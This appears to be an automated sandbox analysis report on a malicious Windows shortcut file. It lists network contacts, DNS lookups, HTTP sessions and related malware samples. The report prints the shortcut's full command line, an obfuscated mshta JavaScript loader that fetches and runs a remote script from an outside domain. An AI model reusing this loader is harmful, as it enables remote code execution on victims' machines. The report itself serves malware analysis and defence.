            https://intake-logging.wikimedia.org/v1/eventsxmshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://cronal184.phroativa.com.br/mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236239083.0000028863F8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://upload.wikimedia.org/wikipedia/en/thumb/8/80/Wikipedia-logo-v2.svg/2244px-Wikipedia-logo-v2.mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drfalse
            • Avira URL Cloud: safe
            unknown
            https://cronal184.phroativa.com.br/?2/Umshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://play.google.com/store/apps/details?id=org.wikipmshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            HTtps://cronal184.phroativa.com.br/?2/(mshta.exe, 00000003.00000002.1236137885.0000028863F3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://cronal184.phroativa.com.br/?2/Stmshta.exe, 00000003.00000002.1236630762.0000029066412000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://donate.wikimedia.org/?utm_medium=portal&utm_campaign=portalFooter&utm_source=portalFootermshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drfalse
            • Avira URL Cloud: safe
            unknown
            https://meta.wikimedia.org/wiki/Privacy_policymshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drfalse
            • Avira URL Cloud: safe
            unknown
            https://wikis.world/mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drfalse
            • Avira URL Cloud: safe
            unknown
            https://meta.wikimedia.org/wiki/Special:MyLanguage/List_of_Wikipediasmshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drfalse
            • Avira URL Cloud: safe
            unknown
            https://meta.wikimedia.org/wiki/Terms_of_usemshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.drfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            172.67.217.192
            cronal184.phroativa.com.brUnited States
            13335CLOUDFLARENETUSfalse
            185.15.59.224
            dyna.wikimedia.orgNetherlands
            14907WIKIMEDIAUSfalse
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1446726
            Start date and time:2024-05-23 20:19:15 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 8s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:19
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:V_273686.Lnk.lnk
            Detection:MAL
            Classification:mal68.troj.winLNK@4/1@2/2
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 1
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .lnk
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target mshta.exe, PID 1088 because there are no executed function
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: V_273686.Lnk.lnk
            No simulations
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            185.15.59.224HELP_DECRYPT.HTMLGet hashmaliciousUnknownBrowse
            • en.wikipedia.org/wiki/RSA_(cryptosystem)
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            dyna.wikimedia.org41q1oGpbEVt.exeGet hashmaliciousUnknownBrowse
            • 185.15.59.224
            HELP_DECRYPT.HTMLGet hashmaliciousUnknownBrowse
            • 185.15.59.224
            https://meteor-acoustic-sidewalk.glitch.me/Lindfield-Corporate-Services-Limited.htmlGet hashmaliciousHTMLPhisherBrowse
            • 185.15.59.224
            https://url2.mailanyone.net/scanner?m=1s7Evq-0007EB-6J&d=4%7Cmail%2F90%2F1715780400%2F1s7Evq-0007EB-6J%7Cin2i%7C57e1b682%7C17902772%7C12174482%7C6644BC4212C7219CC3D95447C76EA5DF&o=%2Fphtl%3A%2Fatspdlaollrnaesgrrivpesecotoivdetvncs.lieadmoc.mumsr&s=t0r_WT18ihf43ksnkduWkgiRI_oGet hashmaliciousUnknownBrowse
            • 208.80.154.224
            https://url2.mailanyone.net/scanner?m=1s7Evq-0007EB-6J&d=4%7Cmail%2F90%2F1715780400%2F1s7Evq-0007EB-6J%7Cin2i%7C57e1b682%7C17902772%7C12174482%7C6644BC4212C7219CC3D95447C76EA5DF&o=%2Fphtl%3A%2Fatspdlaollrnaesgrrivpesecotoivdetvncs.lieadmoc.mumsr&s=t0r_WT18ihf43ksnkduWkgiRI_oGet hashmaliciousUnknownBrowse
            • 208.80.154.224
            https://www.googleadservices.com/pagead/aclk?nis=4&sa=L&ai=CKfLq4UP_ZInPPI7FkPIPj7aLmAGSiqn2cobcuuTIEczgjN6eDhABINnPliJgyQagAcj0xcYpyAEJqQL47guMmDF5PqgDAcgDywSqBNIBT9CPx3tnMEwX1LsgYESMhVibMF5nlwos4i6xas95ZGC2LcoLzOoI03mEfRiShbbX6IbNOI3m02fS-2B2lGVralYVykeNcpKxeGcRKfkHxfjw6hnsDZmyfsYr_gbYnHmPTQ5hvuoNMMVWc4Dcjt4GMpJ2_IaIpY60SIx3ypxqCS8MHVfyJ5WYVKWpobw8tUcyW7Rr7w8gbOkI9KqiKQ0ffCadLHx_JCAyCpKvKc_Vjjj4I0cZaCCZClm-wpCHYkJLS2bZROvyFdChFdQ9yK4xquihwASJtJCmtQSIBbq7y5VMoAYugAfB56zkBKgH2baxAqgHjs4bqAeT2BuoB-6WsQKoB_6esQKoB6SjsQKoB9XJG6gHpr4bqAeaBqgH89EbqAeW2BuoB6qbsQKoB4OtsQKoB_-esQKoB9-fsQKoB8qpsQKoB-ulsQLYBwDSCBQIgGEQARgfMgKKAjoCgEBIvf3BOrEJ41A_P2kBSEyACgGYCwHICwGADAHaDBEKCxCw3srLm_bkxe8BEgIBA6oNAlVTyA0BuBPkA9gTDIgUA9AVAfgWAYAXAQ&ae=1&ase=2&gclid=EAIaIQobChMIycO8zICjgQMVjiJECB0P2wITEAEYASAAEgKIsvD_BwE&num=1&cid=CAQSKQBpAlJWEvTZRstSCvv91yLdzalNUFgP1TzizTwfkL-gNnInmuMKUovsGAE&sig=AOD64_2Zw6tVkwiZF_oVPNINdF3sjG6jfQ&client=ca-pub-1452786187751943&rf=1&nb=9&adurl=https://myfileshares.hotelidealrestobar.com.ar/?username=jmoncada@eversheds-sutherland.esGet hashmaliciousUnknownBrowse
            • 198.35.26.96
            https://vk.com/away.php?to=https://tracker.club-os.com///////campaign/click?msgId=d738c6bd137e6a03157c6c728cbc659e734fc398%26test=false%26target=neoparts.com.br/gben/mo1n/anB1cmR1bUBvcC1mLm9yZw==$Get hashmaliciousFake CaptchaBrowse
            • 208.80.154.224
            https://app.seesaw.me/pages/shared_item?item_id=item.58b6fb6e-2c9d-46b1-9968-9a9a8a4b0970&share_token=cOvKINmbTH-gqWG1vTyEWA&mode=shareGet hashmaliciousUnknownBrowse
            • 198.35.26.96
            https://wtf.cl/admin/Get hashmaliciousUnknownBrowse
            • 208.80.154.224
            https://u.to/rh6dIAGet hashmaliciousUnknownBrowse
            • 208.80.154.224
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CLOUDFLARENETUSkam.cmdGet hashmaliciousGuLoaderBrowse
            • 104.21.28.80
            https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
            • 104.21.39.66
            https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4Get hashmaliciousHTMLPhisherBrowse
            • 172.64.154.146
            http://all4promos.comGet hashmaliciousUnknownBrowse
            • 162.247.243.29
            Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
            • 172.67.74.152
            nv6mqExGOo.exeGet hashmaliciousAsyncRAT, XWormBrowse
            • 104.26.0.5
            PstCgdvsgB.exeGet hashmaliciousLummaC, RisePro StealerBrowse
            • 104.26.5.15
            1n4J6tLgsc.exeGet hashmaliciousRisePro StealerBrowse
            • 104.26.5.15
            N35q9x6n9c.exeGet hashmaliciousRisePro StealerBrowse
            • 172.67.75.166
            PstCgdvsgB.exeGet hashmaliciousRisePro StealerBrowse
            • 172.67.75.166
            WIKIMEDIAUSRE Fasthosts - Payment Failed.emlGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
            • 185.15.59.240
            https://solve-page.github.io/removeGet hashmaliciousUnknownBrowse
            • 185.15.59.240
            https://solve-page.github.io/monetiztionGet hashmaliciousUnknownBrowse
            • 185.15.59.240
            HELP_DECRYPT.HTMLGet hashmaliciousUnknownBrowse
            • 185.15.59.240
            http://shwetaayadav.github.io/shwetaottproject/Get hashmaliciousUnknownBrowse
            • 185.15.59.240
            http://siddiquimehvish07.github.io/netflix.github.ioGet hashmaliciousUnknownBrowse
            • 185.15.59.240
            http://asynchronous-javascriptor.github.io/Netflix_cloneGet hashmaliciousUnknownBrowse
            • 185.15.59.240
            https://meteor-acoustic-sidewalk.glitch.me/Lindfield-Corporate-Services-Limited.htmlGet hashmaliciousHTMLPhisherBrowse
            • 185.15.58.224
            https://www.debbyline.it/Get hashmaliciousUnknownBrowse
            • 185.15.59.240
            https://large-exuberant-lantern.glitch.me/perm78665an897nt.htmlGet hashmaliciousHTMLPhisherBrowse
            • 208.80.154.240
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            37f463bf4616ecd445d4a1937da06e19kam.cmdGet hashmaliciousGuLoaderBrowse
            • 172.67.217.192
            • 185.15.59.224
            file.exeGet hashmaliciousVidarBrowse
            • 172.67.217.192
            • 185.15.59.224
            Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 172.67.217.192
            • 185.15.59.224
            FRA.0038222.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 172.67.217.192
            • 185.15.59.224
            upload.vbsGet hashmaliciousUnknownBrowse
            • 172.67.217.192
            • 185.15.59.224
            upload.vbsGet hashmaliciousGuLoader, XWormBrowse
            • 172.67.217.192
            • 185.15.59.224
            update.vbsGet hashmaliciousGuLoader, XWormBrowse
            • 172.67.217.192
            • 185.15.59.224
            file.vbsGet hashmaliciousGuLoaderBrowse
            • 172.67.217.192
            • 185.15.59.224
            windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
            • 172.67.217.192
            • 185.15.59.224
            update.vbsGet hashmaliciousUnknownBrowse
            • 172.67.217.192
            • 185.15.59.224
            No context
            Process:C:\Windows\System32\mshta.exe
            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (27738)
            Category:dropped
            Size (bytes):78060
            Entropy (8bit):5.544919840817175
            Encrypted:false
            SSDEEP:1536:WKHwz3j2383MA83MUXKtrmrefIV4eIVKFeaY:WuT5eaY
            MD5:077E36EB6628FCE80C3449B6ED207B8E
            SHA1:559EE0AAC8ADC15BB17FB1DED93250D1548B3DC8
            SHA-256:44BB26DCC0205A3C9329A3A05A63FEC50F20D9DC2F41E047255A5B2A6DAE4A13
            SHA-512:93887F5D696478D62CA204284F91BC843DE232EA92B716864ADACBB5C4CBA35115743C618AF646AC8AE00DADCB6227398AD95A220AB717DFF2B6BB405D50AA5E
            Malicious:false
            Reputation:low
            Preview:<!DOCTYPE html>.<html lang="en" class="no-js">.<head>.<meta charset="utf-8">.<title>Wikipedia</title>.<meta name="description" content="Wikipedia is a free online encyclopedia, created and edited by volunteers around the world and hosted by the Wikimedia Foundation.">.<script>.document.documentElement.className = document.documentElement.className.replace( /(^|\s)no-js(\s|$)/, "$1js-enabled$2" );.</script>.<meta name="viewport" content="initial-scale=1,user-scalable=yes">.<link rel="apple-touch-icon" href="/static/apple-touch/wikipedia.png">.<link rel="shortcut icon" href="/static/favicon/wikipedia.ico">.<link rel="license" href="//creativecommons.org/licenses/by-sa/4.0/">.<style>..sprite{background-image:linear-gradient(transparent,transparent),url(portal/wikipedia.org/assets/img/sprite-de847d1a.svg);background-repeat:no-repeat;display:inline-block;vertical-align:middle}.svg-Commons-logo_sister{background-position:0 0;width:47px;height:47px}.svg-MediaWiki-logo_sister{background-positi
            File type:MS Windows shortcut, Item id list present, Has command line arguments, Archive, ctime=*Invalid time*, mtime=*Invalid time*, atime=*Invalid time*, length=812712743, window=hidenormalshowminimized
            Entropy (8bit):7.979394582482121
            TrID:
            • Windows Shortcut (20020/1) 100.00%
            File name:V_273686.Lnk.lnk
            File size:14'809 bytes
            MD5:1dca9e98e575af3b1e2b90e59d75dc43
            SHA1:16cc510d884cae94137a9fbf90c4d2c0f0c5d2f1
            SHA256:a89872c21ac68096a76a60e5a13c77ddf79252c3097aea42865879c5b6d452f3
            SHA512:abbe50c0e93d99fe2c12c0c6c33204b28deeecf038f6cf11f67ba6ce770e4b95a7c3c9562512747a8df607408f342a877514e4d1d1dfedc3a5d96d9953563129
            SSDEEP:384:nhjOveahqUcUXmdw7o3m7Ylw0sBsHorbqaUA/d:pOvShUXm68m00e1DY
            TLSH:0562D10C668CF69DC66C4175FF8F3B5489B94F2C4948F6DBCA98F0460189B119CE1B57
            File Content Preview:L..................F!... ...J.x...i3J.x...i3J.x...i3'.q0....................Y....P.O. .:i.....+00.../C:\......................'.2...........Windows\System32\cmd.exe...0./c MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160
            Icon Hash:b0ef3ac32d2dadad

            General

            Relative Path:
            Command Line Argument:/c MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"
            Icon location:
            TimestampSource PortDest PortSource IPDest IP
            May 23, 2024 20:20:06.188791037 CEST49700443192.168.2.7172.67.217.192
            May 23, 2024 20:20:06.188838005 CEST44349700172.67.217.192192.168.2.7
            May 23, 2024 20:20:06.189021111 CEST49700443192.168.2.7172.67.217.192
            May 23, 2024 20:20:06.197081089 CEST49700443192.168.2.7172.67.217.192
            May 23, 2024 20:20:06.197098970 CEST44349700172.67.217.192192.168.2.7
            May 23, 2024 20:20:06.686425924 CEST44349700172.67.217.192192.168.2.7
            May 23, 2024 20:20:06.686599016 CEST49700443192.168.2.7172.67.217.192
            May 23, 2024 20:20:06.928606033 CEST49700443192.168.2.7172.67.217.192
            May 23, 2024 20:20:06.928633928 CEST44349700172.67.217.192192.168.2.7
            May 23, 2024 20:20:06.928982973 CEST44349700172.67.217.192192.168.2.7
            May 23, 2024 20:20:06.929570913 CEST49700443192.168.2.7172.67.217.192
            May 23, 2024 20:20:06.931574106 CEST49700443192.168.2.7172.67.217.192
            May 23, 2024 20:20:06.978497982 CEST44349700172.67.217.192192.168.2.7
            May 23, 2024 20:20:07.066234112 CEST44349700172.67.217.192192.168.2.7
            May 23, 2024 20:20:07.066291094 CEST44349700172.67.217.192192.168.2.7
            May 23, 2024 20:20:07.066375017 CEST49700443192.168.2.7172.67.217.192
            May 23, 2024 20:20:07.102112055 CEST49700443192.168.2.7172.67.217.192
            May 23, 2024 20:20:07.102138042 CEST44349700172.67.217.192192.168.2.7
            May 23, 2024 20:20:07.164134026 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:07.164171934 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:07.164242029 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:07.164520979 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:07.164535046 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:07.922908068 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:07.923052073 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:07.923069000 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:07.923114061 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:07.927180052 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:07.927185059 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:07.927587986 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:07.927656889 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:07.928129911 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:07.974500895 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.258228064 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.258258104 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.258270979 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.258364916 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:08.258389950 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.258414030 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:08.258441925 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:08.323981047 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.324019909 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.324124098 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:08.324124098 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:08.324162006 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.324212074 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:08.327969074 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.328036070 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:08.358365059 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.358381987 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.358614922 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:08.358650923 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.358699083 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:08.404129982 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.404149055 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.404277086 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:08.404297113 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.404346943 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:08.417782068 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.417828083 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.417870998 CEST44349701185.15.59.224192.168.2.7
            May 23, 2024 20:20:08.417892933 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:08.417943954 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:08.418143988 CEST49701443192.168.2.7185.15.59.224
            May 23, 2024 20:20:08.418159008 CEST44349701185.15.59.224192.168.2.7
            TimestampSource PortDest PortSource IPDest IP
            May 23, 2024 20:20:06.120917082 CEST5465453192.168.2.71.1.1.1
            May 23, 2024 20:20:06.183650970 CEST53546541.1.1.1192.168.2.7
            May 23, 2024 20:20:07.103394985 CEST5897853192.168.2.71.1.1.1
            May 23, 2024 20:20:07.163172007 CEST53589781.1.1.1192.168.2.7
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            May 23, 2024 20:20:06.120917082 CEST192.168.2.71.1.1.10xbe37Standard query (0)cronal184.phroativa.com.brA (IP address)IN (0x0001)false
            May 23, 2024 20:20:07.103394985 CEST192.168.2.71.1.1.10x6c69Standard query (0)www.wikipedia.orgA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            May 23, 2024 20:20:06.183650970 CEST1.1.1.1192.168.2.70xbe37No error (0)cronal184.phroativa.com.br172.67.217.192A (IP address)IN (0x0001)false
            May 23, 2024 20:20:06.183650970 CEST1.1.1.1192.168.2.70xbe37No error (0)cronal184.phroativa.com.br104.21.16.253A (IP address)IN (0x0001)false
            May 23, 2024 20:20:07.163172007 CEST1.1.1.1192.168.2.70x6c69No error (0)www.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
            May 23, 2024 20:20:07.163172007 CEST1.1.1.1192.168.2.70x6c69No error (0)dyna.wikimedia.org185.15.59.224A (IP address)IN (0x0001)false
            • cronal184.phroativa.com.br
            • www.wikipedia.org
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.749700172.67.217.1924431088C:\Windows\System32\mshta.exe
            TimestampBytes transferredDirectionData
            2024-05-23 18:20:06 UTC309OUTGET /?2/ HTTP/1.1
            Accept: */*
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: cronal184.phroativa.com.br
            Connection: Keep-Alive
            2024-05-23 18:20:07 UTC830INHTTP/1.1 302 Found
            Date: Thu, 23 May 2024 18:20:07 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Set-Cookie: PHPSESSID=ssvn8lbn6nna0qhqhvfi85h894; path=/
            Expires: Thu, 19 Nov 1981 08:52:00 GMT
            Cache-Control: no-store, no-cache, must-revalidate
            Pragma: no-cache
            Access-Control-Allow-Origin: *
            Location: https://www.wikipedia.org
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=whFvheWKRZisK32%2FFROigjFZs7KWeVjZF3EoPrZquEBLl0cg%2B77xtgYp7zyxngsf6MJMAgmikH9X9LXCQmuJhRy58Gx7YHemjdNKnsAii0mxF7lK79MjN9umipbnAiqmzXqPVkpP0vdobKyHUA%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 88870edfae6f0c80-EWR
            alt-svc: h3=":443"; ma=86400
            2024-05-23 18:20:07 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.749701185.15.59.2244431088C:\Windows\System32\mshta.exe
            TimestampBytes transferredDirectionData
            2024-05-23 18:20:07 UTC297OUTGET / HTTP/1.1
            Accept: */*
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Connection: Keep-Alive
            Host: www.wikipedia.org
            2024-05-23 18:20:08 UTC1269INHTTP/1.1 200 OK
            date: Thu, 23 May 2024 09:38:15 GMT
            cache-control: s-maxage=86400, must-revalidate, max-age=3600
            server: ATS/9.1.4
            etag: W/"130ec-61857c5dbc640"
            last-modified: Mon, 13 May 2024 15:45:21 GMT
            content-type: text/html
            vary: Accept-Encoding
            age: 31312
            x-cache: cp3073 miss, cp3073 hit/820813
            x-cache-status: hit-front
            server-timing: cache;desc="hit-front", host;desc="cp3073"
            strict-transport-security: max-age=106384710; includeSubDomains; preload
            report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
            nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
            set-cookie: WMF-Last-Access=23-May-2024;Path=/;HttpOnly;secure;Expires=Mon, 24 Jun 2024 12:00:00 GMT
            set-cookie: WMF-Last-Access-Global=23-May-2024;Path=/;Domain=.wikipedia.org;HttpOnly;secure;Expires=Mon, 24 Jun 2024 12:00:00 GMT
            x-client-ip: 8.46.123.175
            set-cookie: GeoIP=US:NY:New_York:40.71:-74.01:v4; Path=/; secure; Domain=.wikipedia.org
            set-cookie: NetworkProbeLimit=0.001;Path=/;Secure;Max-Age=3600
            accept-ranges: bytes
            content-length: 78060
            connection: close
